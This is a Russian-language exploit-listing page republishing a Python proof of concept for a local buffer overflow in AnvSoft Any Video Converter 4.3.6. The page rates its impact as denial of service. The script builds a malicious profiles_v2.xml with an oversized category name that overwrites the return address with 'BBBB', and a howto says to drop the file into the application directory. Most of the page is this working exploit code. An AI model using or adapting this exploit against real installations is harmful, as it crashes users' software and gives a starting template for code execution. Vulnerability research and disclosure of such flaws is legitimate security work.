AnvSoft Any Video Converter 4.3.6 Buffer Overflow PoC

Свойства

Дата публикации:
07.04.2012
Цель:
AnvSoft Any Video Converter 4.3.6
Тип воздействия:
Отказ в обслуживании

Код



#!/usr/bin/python

# Exploit Title: AnvSoft Any Video Converter Free/Pro/Ultimate v4.3.6 Local Buffer Overflow
# Version:       4.3.6
# Software Link: http://www.any-video-converter.com
# Notes:         Nearly all items in profiles_v2.xml are vulnerable
# Howto:         Copy profiles_v2.xml to App-Dir --> Launch

file="profiles_v2.xml"

junk1="\x41" * 332
boom="\x42\x42\x42\x42"
junk2="\x43" * 100

poc="<root>\n"
poc=poc + "<categories>\n"
poc=poc + "<category name=\"" + junk1 + boom + junk2 + "\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
poc=poc + "</categories>\n"
poc=poc + "<groups></groups>\n<profiles></profiles>\n</root>\n"

try:
    print "[*] Creating exploit file...\n"
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!"
except:
    print "[!] Error while creating file!"



или введите имя

CAPTCHA